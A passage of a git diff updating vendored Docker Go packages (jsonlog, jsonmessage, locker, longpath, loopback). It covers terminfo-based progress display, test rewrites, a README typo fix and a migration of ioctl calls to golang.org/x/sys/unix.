[]byte(`{"hello":"world","value":1234}`)}: `^{\"log\":\"A log line\",\"attrs\":{\"hello\":\"world\",\"value\":1234},\"time\":}$`, - } - for jsonLog, expression := range logs { - var buf bytes.Buffer - if err := jsonLog.MarshalJSONBuf(&buf); err != nil { - t.Fatal(err) - } - res := buf.String() - t.Logf("Result of WriteLog: %q", 
res) - logRe := regexp.MustCompile(expression) - if !logRe.MatchString(res) { - t.Fatalf("Log line not in expected format [%v]: %q", expression, res) - } - } -} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go deleted file mode 100644 index 2117338149..0000000000 --- a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go +++ /dev/null @@ -1,27 +0,0 @@ -// Package jsonlog provides helper functions to parse and print time (time.Time) as JSON. -package jsonlog - -import ( - "errors" - "time" -) - -const ( - // RFC3339NanoFixed is our own version of RFC339Nano because we want one - // that pads the nano seconds part with zeros to ensure - // the timestamps are aligned in the logs. - RFC3339NanoFixed = "2006-01-02T15:04:05.000000000Z07:00" - // JSONFormat is the format used by FastMarshalJSON - JSONFormat = `"` + time.RFC3339Nano + `"` -) - -// FastTimeMarshalJSON avoids one of the extra allocations that -// time.MarshalJSON is making. -func FastTimeMarshalJSON(t time.Time) (string, error) { - if y := t.Year(); y < 0 || y >= 10000 { - // RFC 3339 is clear that years are 4 digits exactly. - // See golang.org/issue/4556#c15 for more discussion. 
- return "", errors.New("time.MarshalJSON: year outside of range [0,9999]") - } - return t.Format(JSONFormat), nil -} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go deleted file mode 100644 index 02d0302c4a..0000000000 --- a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go +++ /dev/null @@ -1,47 +0,0 @@ -package jsonlog - -import ( - "testing" - "time" -) - -// Testing to ensure 'year' fields is between 0 and 9999 -func TestFastTimeMarshalJSONWithInvalidDate(t *testing.T) { - aTime := time.Date(-1, 1, 1, 0, 0, 0, 0, time.Local) - json, err := FastTimeMarshalJSON(aTime) - if err == nil { - t.Fatalf("FastTimeMarshalJSON should throw an error, but was '%v'", json) - } - anotherTime := time.Date(10000, 1, 1, 0, 0, 0, 0, time.Local) - json, err = FastTimeMarshalJSON(anotherTime) - if err == nil { - t.Fatalf("FastTimeMarshalJSON should throw an error, but was '%v'", json) - } - -} - -func TestFastTimeMarshalJSON(t *testing.T) { - aTime := time.Date(2015, 5, 29, 11, 1, 2, 3, time.UTC) - json, err := FastTimeMarshalJSON(aTime) - if err != nil { - t.Fatal(err) - } - expected := "\"2015-05-29T11:01:02.000000003Z\"" - if json != expected { - t.Fatalf("Expected %v, got %v", expected, json) - } - - location, err := time.LoadLocation("Europe/Paris") - if err != nil { - t.Fatal(err) - } - aTime = time.Date(2015, 5, 29, 11, 1, 2, 3, location) - json, err = FastTimeMarshalJSON(aTime) - if err != nil { - t.Fatal(err) - } - expected = "\"2015-05-29T11:01:02.000000003+02:00\"" - if json != expected { - t.Fatalf("Expected %v, got %v", expected, json) - } -} diff --git a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go index 5481433c56..dd95f36704 100644 --- a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go +++ 
b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go @@ -1,17 +1,22 @@ -package jsonmessage +package jsonmessage // import "github.com/docker/docker/pkg/jsonmessage" import ( "encoding/json" "fmt" "io" + "os" "strings" "time" - "github.com/docker/docker/pkg/jsonlog" + "github.com/Nvveen/Gotty" "github.com/docker/docker/pkg/term" "github.com/docker/go-units" ) +// RFC3339NanoFixed is time.RFC3339Nano with nanoseconds padded using zeros to +// ensure the formatted time isalways the same number of characters. +const RFC3339NanoFixed = "2006-01-02T15:04:05.000000000Z07:00" + // JSONError wraps a concrete Code and Message, `Code` is // is an integer error code, `Message` is the error message. type JSONError struct { @@ -32,29 +37,33 @@ type JSONProgress struct { Current int64 `json:"current,omitempty"` Total int64 `json:"total,omitempty"` Start int64 `json:"start,omitempty"` + // If true, don't show xB/yB + HideCounts bool `json:"hidecounts,omitempty"` + Units string `json:"units,omitempty"` + nowFunc func() time.Time + winSize int } func (p *JSONProgress) String() string { var ( - width = 200 + width = p.width() pbBox string numbersBox string timeLeftBox string ) - - ws, err := term.GetWinsize(p.terminalFd) - if err == nil { - width = int(ws.Width) - } - if p.Current <= 0 && p.Total <= 0 { return "" } - current := units.HumanSize(float64(p.Current)) if p.Total <= 0 { - return fmt.Sprintf("%8v", current) + switch p.Units { + case "": + current := units.HumanSize(float64(p.Current)) + return fmt.Sprintf("%8v", current) + default: + return fmt.Sprintf("%d %s", p.Current, p.Units) + } } - total := units.HumanSize(float64(p.Total)) + percentage := int(float64(p.Current)/float64(p.Total)*100) / 2 if percentage > 50 { percentage = 50 @@ -68,15 +77,29 @@ func (p *JSONProgress) String() string { pbBox = fmt.Sprintf("[%s>%s] ", strings.Repeat("=", percentage), strings.Repeat(" ", numSpaces)) } - numbersBox = fmt.Sprintf("%8v/%v", current, total) + switch { + case 
p.HideCounts: + case p.Units == "": // no units, use bytes + current := units.HumanSize(float64(p.Current)) + total := units.HumanSize(float64(p.Total)) + + numbersBox = fmt.Sprintf("%8v/%v", current, total) + + if p.Current > p.Total { + // remove total display if the reported current is wonky. + numbersBox = fmt.Sprintf("%8v", current) + } + default: + numbersBox = fmt.Sprintf("%d/%d %s", p.Current, p.Total, p.Units) - if p.Current > p.Total { - // remove total display if the reported current is wonky. - numbersBox = fmt.Sprintf("%8v", current) + if p.Current > p.Total { + // remove total display if the reported current is wonky. + numbersBox = fmt.Sprintf("%d %s", p.Current, p.Units) + } } if p.Current > 0 && p.Start > 0 && percentage < 50 { - fromStart := time.Now().UTC().Sub(time.Unix(p.Start, 0)) + fromStart := p.now().Sub(time.Unix(p.Start, 0)) perEntry := fromStart / time.Duration(p.Current) left := time.Duration(p.Total-p.Current) * perEntry left = (left / time.Second) * time.Second @@ -88,6 +111,28 @@ func (p *JSONProgress) String() string { return pbBox + numbersBox + timeLeftBox } +// shim for testing +func (p *JSONProgress) now() time.Time { + if p.nowFunc == nil { + p.nowFunc = func() time.Time { + return time.Now().UTC() + } + } + return p.nowFunc() +} + +// shim for testing +func (p *JSONProgress) width() int { + if p.winSize != 0 { + return p.winSize + } + ws, err := term.GetWinsize(p.terminalFd) + if err == nil { + return int(ws.Width) + } + return 200 +} + // JSONMessage defines a message struct. It describes // the created time, where it from, status, ID of the // message. It's used for docker events. @@ -102,32 +147,82 @@ type JSONMessage struct { TimeNano int64 `json:"timeNano,omitempty"` Error *JSONError `json:"errorDetail,omitempty"` ErrorMessage string `json:"error,omitempty"` //deprecated - // Aux contains out-of-band data, such as digests for push signing. 
+ // Aux contains out-of-band data, such as digests for push signing and image id after building. Aux *json.RawMessage `json:"aux,omitempty"` } -// Display displays the JSONMessage to `out`. `isTerminal` describes if `out` +/* Satisfied by gotty.TermInfo as well as noTermInfo from below */ +type termInfo interface { + Parse(attr string, params ...interface{}) (string, error) +} + +type noTermInfo struct{} // canary used when no terminfo. + +func (ti *noTermInfo) Parse(attr string, params ...interface{}) (string, error) { + return "", fmt.Errorf("noTermInfo") +} + +func clearLine(out io.Writer, ti termInfo) { + // el2 (clear whole line) is not exposed by terminfo. + + // First clear line from beginning to cursor + if attr, err := ti.Parse("el1"); err == nil { + fmt.Fprintf(out, "%s", attr) + } else { + fmt.Fprintf(out, "\x1b[1K") + } + // Then clear line from cursor to end + if attr, err := ti.Parse("el"); err == nil { + fmt.Fprintf(out, "%s", attr) + } else { + fmt.Fprintf(out, "\x1b[K") + } +} + +func cursorUp(out io.Writer, ti termInfo, l int) { + if l == 0 { // Should never be the case, but be tolerant + return + } + if attr, err := ti.Parse("cuu", l); err == nil { + fmt.Fprintf(out, "%s", attr) + } else { + fmt.Fprintf(out, "\x1b[%dA", l) + } +} + +func cursorDown(out io.Writer, ti termInfo, l int) { + if l == 0 { // Should never be the case, but be tolerant + return + } + if attr, err := ti.Parse("cud", l); err == nil { + fmt.Fprintf(out, "%s", attr) + } else { + fmt.Fprintf(out, "\x1b[%dB", l) + } +} + +// Display displays the JSONMessage to `out`. `termInfo` is non-nil if `out` // is a terminal. If this is the case, it will erase the entire current line // when displaying the progressbar. 
-func (jm *JSONMessage) Display(out io.Writer, isTerminal bool) error { +func (jm *JSONMessage) Display(out io.Writer, termInfo termInfo) error { if jm.Error != nil { if jm.Error.Code == 401 { - return fmt.Errorf("Authentication is required.") + return fmt.Errorf("authentication is required") } return jm.Error } var endl string - if isTerminal && jm.Stream == "" && jm.Progress != nil { - // [2K = erase entire current line - fmt.Fprintf(out, "%c[2K\r", 27) + if termInfo != nil && jm.Stream == "" && jm.Progress != nil { + clearLine(out, termInfo) endl = "\r" + fmt.Fprintf(out, endl) } else if jm.Progress != nil && jm.Progress.String() != "" { //disable progressbar in non-terminal return nil } if jm.TimeNano != 0 { - fmt.Fprintf(out, "%s ", time.Unix(0, jm.TimeNano).Format(jsonlog.RFC3339NanoFixed)) + fmt.Fprintf(out, "%s ", time.Unix(0, jm.TimeNano).Format(RFC3339NanoFixed)) } else if jm.Time != 0 { - fmt.Fprintf(out, "%s ", time.Unix(jm.Time, 0).Format(jsonlog.RFC3339NanoFixed)) + fmt.Fprintf(out, "%s ", time.Unix(jm.Time, 0).Format(RFC3339NanoFixed)) } if jm.ID != "" { fmt.Fprintf(out, "%s: ", jm.ID) @@ -135,7 +230,7 @@ func (jm *JSONMessage) Display(out io.Writer, isTerminal bool) error { if jm.From != "" { fmt.Fprintf(out, "(from %s) ", jm.From) } - if jm.Progress != nil && isTerminal { + if jm.Progress != nil && termInfo != nil { fmt.Fprintf(out, "%s %s%s", jm.Status, jm.Progress.String(), endl) } else if jm.ProgressMessage != "" { //deprecated fmt.Fprintf(out, "%s %s%s", jm.Status, jm.ProgressMessage, endl) @@ -150,11 +245,26 @@ func (jm *JSONMessage) Display(out io.Writer, isTerminal bool) error { // DisplayJSONMessagesStream displays a json message stream from `in` to `out`, `isTerminal` // describes if `out` is a terminal. If this is the case, it will print `\n` at the end of // each line and move the cursor while displaying. 
-func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, isTerminal bool, auxCallback func(*json.RawMessage)) error { +func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, isTerminal bool, auxCallback func(JSONMessage)) error { var ( dec = json.NewDecoder(in) ids = make(map[string]int) ) + + var termInfo termInfo + + if isTerminal { + term := os.Getenv("TERM") + if term == "" { + term = "vt102" + } + + var err error + if termInfo, err = gotty.OpenTermInfo(term); err != nil { + termInfo = &noTermInfo{} + } + } + for { diff := 0 var jm JSONMessage @@ -167,7 +277,7 @@ func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, if jm.Aux != nil { if auxCallback != nil { - auxCallback(jm.Aux) + auxCallback(jm) } continue } @@ -186,13 +296,13 @@ func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, // with no ID. line = len(ids) ids[jm.ID] = line - if isTerminal { + if termInfo != nil { fmt.Fprintf(out, "\n") } } diff = len(ids) - line - if isTerminal && diff > 0 { - fmt.Fprintf(out, "%c[%dA", 27, diff) + if termInfo != nil { + cursorUp(out, termInfo, diff) } } else { // When outputting something that isn't progress @@ -202,9 +312,9 @@ func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, // with multiple tags). 
ids = make(map[string]int) } - err := jm.Display(out, isTerminal) - if jm.ID != "" && isTerminal && diff > 0 { - fmt.Fprintf(out, "%c[%dB", 27, diff) + err := jm.Display(out, termInfo) + if jm.ID != "" && termInfo != nil { + cursorDown(out, termInfo, diff) } if err != nil { return err @@ -220,6 +330,6 @@ type stream interface { } // DisplayJSONMessagesToStream prints json messages to the output stream -func DisplayJSONMessagesToStream(in io.Reader, stream stream, auxCallback func(*json.RawMessage)) error { +func DisplayJSONMessagesToStream(in io.Reader, stream stream, auxCallback func(JSONMessage)) error { return DisplayJSONMessagesStream(in, stream, stream.FD(), stream.IsTerminal(), auxCallback) } diff --git a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go index c6c5b0ed2a..223d9c7f5a 100644 --- a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go +++ b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go @@ -1,68 +1,116 @@ -package jsonmessage +package jsonmessage // import "github.com/docker/docker/pkg/jsonmessage" import ( "bytes" "fmt" + "os" "strings" "testing" "time" - "github.com/docker/docker/pkg/jsonlog" "github.com/docker/docker/pkg/term" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestError(t *testing.T) { je := JSONError{404, "Not found"} - if je.Error() != "Not found" { - t.Fatalf("Expected 'Not found' got '%s'", je.Error()) - } + assert.Assert(t, is.Error(&je, "Not found")) } -func TestProgress(t *testing.T) { - termsz, err := term.GetWinsize(0) - if err != nil { - // we can safely ignore the err here - termsz = nil - } - jp := JSONProgress{} - if jp.String() != "" { - t.Fatalf("Expected empty string, got '%s'", jp.String()) +func TestProgressString(t *testing.T) { + type expected struct { + short string + long string } - expected := " 1 B" - jp2 := JSONProgress{Current: 1} - if jp2.String() != expected { - 
t.Fatalf("Expected %q, got %q", expected, jp2.String()) + shortAndLong := func(short, long string) expected { + return expected{short: short, long: long} } - expectedStart := "[==========> ] 20 B/100 B" - if termsz != nil && termsz.Width <= 110 { - expectedStart = " 20 B/100 B" - } - jp3 := JSONProgress{Current: 20, Total: 100, Start: time.Now().Unix()} - // Just look at the start of the string - // (the remaining time is really hard to test -_-) - if jp3.String()[:len(expectedStart)] != expectedStart { - t.Fatalf("Expected to start with %q, got %q", expectedStart, jp3.String()) + start := time.Date(2017, 12, 3, 15, 10, 1, 0, time.UTC) + timeAfter := func(delta time.Duration) func() time.Time { + return func() time.Time { + return start.Add(delta) + } } - expected = "[=========================> ] 50 B/100 B" - if termsz != nil && termsz.Width <= 110 { - expected = " 50 B/100 B" - } - jp4 := JSONProgress{Current: 50, Total: 100} - if jp4.String() != expected { - t.Fatalf("Expected %q, got %q", expected, jp4.String()) + var testcases = []struct { + name string + progress JSONProgress + expected expected + }{ + { + name: "no progress", + }, + { + name: "progress 1", + progress: JSONProgress{Current: 1}, + expected: shortAndLong(" 1B", " 1B"), + }, + { + name: "some progress with a start time", + progress: JSONProgress{ + Current: 20, + Total: 100, + Start: start.Unix(), + nowFunc: timeAfter(time.Second), + }, + expected: shortAndLong( + " 20B/100B 4s", + "[==========> ] 20B/100B 4s", + ), + }, + { + name: "some progress without a start time", + progress: JSONProgress{Current: 50, Total: 100}, + expected: shortAndLong( + " 50B/100B", + "[=========================> ] 50B/100B", + ), + }, + { + name: "current more than total is not negative gh#7136", + progress: JSONProgress{Current: 50, Total: 40}, + expected: shortAndLong( + " 50B", + "[==================================================>] 50B", + ), + }, + { + name: "with units", + progress: JSONProgress{Current: 50, 
Total: 100, Units: "units"}, + expected: shortAndLong( + "50/100 units", + "[=========================> ] 50/100 units", + ), + }, + { + name: "current more than total with units is not negative ", + progress: JSONProgress{Current: 50, Total: 40, Units: "units"}, + expected: shortAndLong( + "50 units", + "[==================================================>] 50 units", + ), + }, + { + name: "hide counts", + progress: JSONProgress{Current: 50, Total: 100, HideCounts: true}, + expected: shortAndLong( + "", + "[=========================> ] ", + ), + }, } - // this number can't be negative gh#7136 - expected = "[==================================================>] 50 B" - if termsz != nil && termsz.Width <= 110 { - expected = " 50 B" - } - jp5 := JSONProgress{Current: 50, Total: 40} - if jp5.String() != expected { - t.Fatalf("Expected %q, got %q", expected, jp5.String()) + for _, testcase := range testcases { + t.Run(testcase.name, func(t *testing.T) { + testcase.progress.winSize = 100 + assert.Equal(t, testcase.progress.String(), testcase.expected.short) + + testcase.progress.winSize = 200 + assert.Equal(t, testcase.progress.String(), testcase.expected.long) + }) } } @@ -70,47 +118,47 @@ func TestJSONMessageDisplay(t *testing.T) { now := time.Now() messages := map[JSONMessage][]string{ // Empty - JSONMessage{}: {"\n", "\n"}, + {}: {"\n", "\n"}, // Status - JSONMessage{ + { Status: "status", }: { "status\n", "status\n", }, // General - JSONMessage{ + { Time: now.Unix(), ID: "ID", From: "From", Status: "status", }: { - fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(jsonlog.RFC3339NanoFixed)), - fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(jsonlog.RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(RFC3339NanoFixed)), }, // General, with nano precision time - JSONMessage{ + 
{ TimeNano: now.UnixNano(), ID: "ID", From: "From", Status: "status", }: { - fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), - fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(RFC3339NanoFixed)), }, // General, with both times Nano is preferred - JSONMessage{ + { Time: now.Unix(), TimeNano: now.UnixNano(), ID: "ID", From: "From", Status: "status", }: { - fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), - fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(RFC3339NanoFixed)), }, // Stream over status - JSONMessage{ + { Status: "status", Stream: "stream", }: { @@ -118,7 +166,7 @@ func TestJSONMessageDisplay(t *testing.T) { "stream", }, // With progress message - JSONMessage{ + { Status: "status", ProgressMessage: "progressMessage", }: { @@ -126,13 +174,13 @@ func TestJSONMessageDisplay(t *testing.T) { "status progressMessage", }, // With progress, stream empty - JSONMessage{ + { Status: "status", Stream: "", Progress: &JSONProgress{Current: 1}, }: { "", - fmt.Sprintf("%c[2K\rstatus 1 B\r", 27), + fmt.Sprintf("%c[1K%c[K\rstatus 1B\r", 27, 27), }, } @@ -140,19 +188,19 @@ func TestJSONMessageDisplay(t *testing.T) { for jsonMessage, expectedMessages := range messages { // Without terminal data := bytes.NewBuffer([]byte{}) - if err := jsonMessage.Display(data, false); err != nil { + if err := jsonMessage.Display(data, nil); err != nil { t.Fatal(err) } if data.String() != 
expectedMessages[0] { - t.Fatalf("Expected [%v], got [%v]", expectedMessages[0], data.String()) + t.Fatalf("Expected %q,got %q", expectedMessages[0], data.String()) } // With terminal data = bytes.NewBuffer([]byte{}) - if err := jsonMessage.Display(data, true); err != nil { + if err := jsonMessage.Display(data, &noTermInfo{}); err != nil { t.Fatal(err) } if data.String() != expectedMessages[1] { - t.Fatalf("Expected [%v], got [%v]", expectedMessages[1], data.String()) + t.Fatalf("\nExpected %q\n got %q", expectedMessages[1], data.String()) } } } @@ -162,16 +210,14 @@ func TestJSONMessageDisplayWithJSONError(t *testing.T) { data := bytes.NewBuffer([]byte{}) jsonMessage := JSONMessage{Error: &JSONError{404, "Can't find it"}} - err := jsonMessage.Display(data, true) + err := jsonMessage.Display(data, &noTermInfo{}) if err == nil || err.Error() != "Can't find it" { - t.Fatalf("Expected a JSONError 404, got [%v]", err) + t.Fatalf("Expected a JSONError 404, got %q", err) } jsonMessage = JSONMessage{Error: &JSONError{401, "Anything"}} - err = jsonMessage.Display(data, true) - if err == nil || err.Error() != "Authentication is required." 
{ - t.Fatalf("Expected an error [Authentication is required.], got [%v]", err) - } + err = jsonMessage.Display(data, &noTermInfo{}) + assert.Check(t, is.Error(err, "authentication is required")) } func TestDisplayJSONMessagesStreamInvalidJSON(t *testing.T) { @@ -183,7 +229,7 @@ func TestDisplayJSONMessagesStreamInvalidJSON(t *testing.T) { inFd, _ = term.GetFdInfo(reader) if err := DisplayJSONMessagesStream(reader, data, inFd, false, nil); err == nil && err.Error()[:17] != "invalid character" { - t.Fatalf("Should have thrown an error (invalid character in ..), got [%v]", err) + t.Fatalf("Should have thrown an error (invalid character in ..), got %q", err) } } @@ -215,9 +261,15 @@ func TestDisplayJSONMessagesStream(t *testing.T) { // With progressDetail "{ \"id\": \"ID\", \"status\": \"status\", \"progressDetail\": { \"Current\": 1} }": { "", // progressbar is disabled in non-terminal - fmt.Sprintf("\n%c[%dA%c[2K\rID: status 1 B\r%c[%dB", 27, 1, 27, 27, 1), + fmt.Sprintf("\n%c[%dA%c[1K%c[K\rID: status 1B\r%c[%dB", 27, 1, 27, 27, 27, 1), }, } + + // Use $TERM which is unlikely to exist, forcing DisplayJSONMessageStream to + // (hopefully) use &noTermInfo. 
+ origTerm := os.Getenv("TERM") + os.Setenv("TERM", "xyzzy-non-existent-terminfo") + for jsonMessage, expectedMessages := range messages { data := bytes.NewBuffer([]byte{}) reader := strings.NewReader(jsonMessage) @@ -228,7 +280,7 @@ func TestDisplayJSONMessagesStream(t *testing.T) { t.Fatal(err) } if data.String() != expectedMessages[0] { - t.Fatalf("Expected an [%v], got [%v]", expectedMessages[0], data.String()) + t.Fatalf("Expected an %q, got %q", expectedMessages[0], data.String()) } // With terminal @@ -238,8 +290,9 @@ func TestDisplayJSONMessagesStream(t *testing.T) { t.Fatal(err) } if data.String() != expectedMessages[1] { - t.Fatalf("Expected an [%v], got [%v]", expectedMessages[1], data.String()) + t.Fatalf("\nExpected %q\n got %q", expectedMessages[1], data.String()) } } + os.Setenv("TERM", origTerm) } diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go b/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go deleted file mode 100644 index ff833e3741..0000000000 --- a/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go +++ /dev/null @@ -1,31 +0,0 @@ -package listeners - -import ( - "crypto/tls" - "fmt" - "net" - - "github.com/docker/go-connections/sockets" -) - -// Init creates new listeners for the server. 
-func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) (ls []net.Listener, err error) { - switch proto { - case "tcp": - l, err := sockets.NewTCPSocket(addr, tlsConfig) - if err != nil { - return nil, err - } - ls = append(ls, l) - case "unix": - l, err := sockets.NewUnixSocket(addr, socketGroup) - if err != nil { - return nil, fmt.Errorf("can't create unix socket %s: %v", addr, err) - } - ls = append(ls, l) - default: - return nil, fmt.Errorf("Invalid protocol format: %q", proto) - } - - return -} diff --git a/vendor/github.com/docker/docker/pkg/locker/README.md b/vendor/github.com/docker/docker/pkg/locker/README.md index e84a815cc5..ce787aefb3 100644 --- a/vendor/github.com/docker/docker/pkg/locker/README.md +++ b/vendor/github.com/docker/docker/pkg/locker/README.md @@ -4,7 +4,7 @@ Locker locker provides a mechanism for creating finer-grained locking to help free up more global locks to handle other tasks. -The implementation looks close to a sync.Mutex, however the user must provide a +The implementation looks close to a sync.Mutex, however, the user must provide a reference to use to refer to the underlying lock when locking and unlocking, and unlock may generate an error. @@ -35,7 +35,7 @@ type important struct { func (i *important) Get(name string) interface{} { i.locks.Lock(name) defer i.locks.Unlock(name) - return data[name] + return i.data[name] } func (i *important) Create(name string, data interface{}) { @@ -44,9 +44,9 @@ func (i *important) Create(name string, data interface{}) { i.createImportant(data) - s.mu.Lock() + i.mu.Lock() i.data[name] = data - s.mu.Unlock() + i.mu.Unlock() } func (i *important) createImportant(data interface{}) { @@ -59,7 +59,7 @@ function (or before doing anything with the underlying state), this ensures any other function that is dealing with the same name will block. When needing to modify the underlying data, use the global lock to ensure nothing -else is modfying it at the same time. 
+else is modifying it at the same time. Since name lock is already in place, no reads will occur while the modification is being performed. diff --git a/vendor/github.com/docker/docker/pkg/locker/locker.go b/vendor/github.com/docker/docker/pkg/locker/locker.go index 0b22ddfab8..dbd47fc465 100644 --- a/vendor/github.com/docker/docker/pkg/locker/locker.go +++ b/vendor/github.com/docker/docker/pkg/locker/locker.go @@ -11,7 +11,7 @@ created. Lock references are automatically cleaned up on `Unlock` if nothing else is waiting for the lock. */ -package locker +package locker // import "github.com/docker/docker/pkg/locker" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/locker/locker_test.go b/vendor/github.com/docker/docker/pkg/locker/locker_test.go index 5a297dd47b..2b0a8a55d6 100644 --- a/vendor/github.com/docker/docker/pkg/locker/locker_test.go +++ b/vendor/github.com/docker/docker/pkg/locker/locker_test.go @@ -1,6 +1,8 @@ -package locker +package locker // import "github.com/docker/docker/pkg/locker" import ( + "math/rand" + "strconv" "sync" "testing" "time" @@ -122,3 +124,38 @@ func TestLockerConcurrency(t *testing.T) { t.Fatalf("lock should not exist: %v", ctr) } } + +func BenchmarkLocker(b *testing.B) { + l := New() + for i := 0; i < b.N; i++ { + l.Lock("test") + l.Unlock("test") + } +} + +func BenchmarkLockerParallel(b *testing.B) { + l := New() + b.SetParallelism(128) + b.RunParallel(func(pb *testing.PB) { + for pb.Next() { + l.Lock("test") + l.Unlock("test") + } + }) +} + +func BenchmarkLockerMoreKeys(b *testing.B) { + l := New() + var keys []string + for i := 0; i < 64; i++ { + keys = append(keys, strconv.Itoa(i)) + } + b.SetParallelism(128) + b.RunParallel(func(pb *testing.PB) { + for pb.Next() { + k := keys[rand.Intn(len(keys))] + l.Lock(k) + l.Unlock(k) + } + }) +} diff --git a/vendor/github.com/docker/docker/pkg/longpath/longpath.go b/vendor/github.com/docker/docker/pkg/longpath/longpath.go index 9b15bfff4c..4177affba2 100644 --- 
a/vendor/github.com/docker/docker/pkg/longpath/longpath.go +++ b/vendor/github.com/docker/docker/pkg/longpath/longpath.go @@ -2,7 +2,7 @@ // in Windows, which are expected to be prepended with `\\?\` and followed by either // a drive letter, a UNC server\share, or a volume identifier. -package longpath +package longpath // import "github.com/docker/docker/pkg/longpath" import ( "strings" diff --git a/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go b/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go index 01865eff09..2bcd008e10 100644 --- a/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go +++ b/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go @@ -1,4 +1,4 @@ -package longpath +package longpath // import "github.com/docker/docker/pkg/longpath" import ( "strings" diff --git a/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go b/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go index 971f45eb48..94feb8fc7d 100644 --- a/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go +++ b/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go @@ -1,14 +1,14 @@ -// +build linux +// +build linux,cgo -package loopback +package loopback // import "github.com/docker/docker/pkg/loopback" import ( "errors" "fmt" "os" - "syscall" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) // Loopback related errors @@ -69,7 +69,7 @@ func openNextAvailableLoopback(index int, sparseFile *os.File) (loopFile *os.Fil loopFile.Close() // If the error is EBUSY, then try the next loopback - if err != syscall.EBUSY { + if err != unix.EBUSY { logrus.Errorf("Cannot set up loopback device %s: %s", target, err) return nil, ErrAttachLoopbackDevice } diff --git a/vendor/github.com/docker/docker/pkg/loopback/ioctl.go b/vendor/github.com/docker/docker/pkg/loopback/ioctl.go index 0714eb5f87..612fd00abe 100644 --- a/vendor/github.com/docker/docker/pkg/loopback/ioctl.go +++ 
b/vendor/github.com/docker/docker/pkg/loopback/ioctl.go @@ -1,36 +1,34 @@ -// +build linux +// +build linux,cgo -package loopback +package loopback // import "github.com/docker/docker/pkg/loopback" import ( - "syscall" "unsafe" + + "golang.org/x/sys/unix" ) func ioctlLoopCtlGetFree(fd uintptr) (int, error) { - index, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, LoopCtlGetFree, 0) - if err != 0 { + index, err := unix.IoctlGetInt(int(fd), LoopCtlGetFree) + if err != nil { return 0, err } - return int(index), nil + return index, nil } func ioctlLoopSetFd(loopFd, sparseFd uintptr) error { - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetFd, sparseFd); err != 0 { - return err - } - return nil + return unix.IoctlSetInt(int(loopFd), LoopSetFd, int(sparseFd)) } func ioctlLoopSetStatus64(loopFd uintptr, loopInfo *loopInfo64) error { - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 { + if _, _, err := unix.Syscall(unix.SYS_IOCTL, loopFd, LoopSetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 { return err } return nil } func ioctlLoopClrFd(loopFd uintptr) error { - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopClrFd, 0); err != 0 { + if _, _, err := unix.Syscall(unix.SYS_IOCTL, loopFd, LoopClrFd, 0); err != 0 { return err } return nil @@ -39,15 +37,12 @@ func ioctlLoopClrFd(loopFd uintptr) error { func ioctlLoopGetStatus64(loopFd uintptr) (*loopInfo64, error) { loopInfo := &loopInfo64{} - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopGetStatus64, 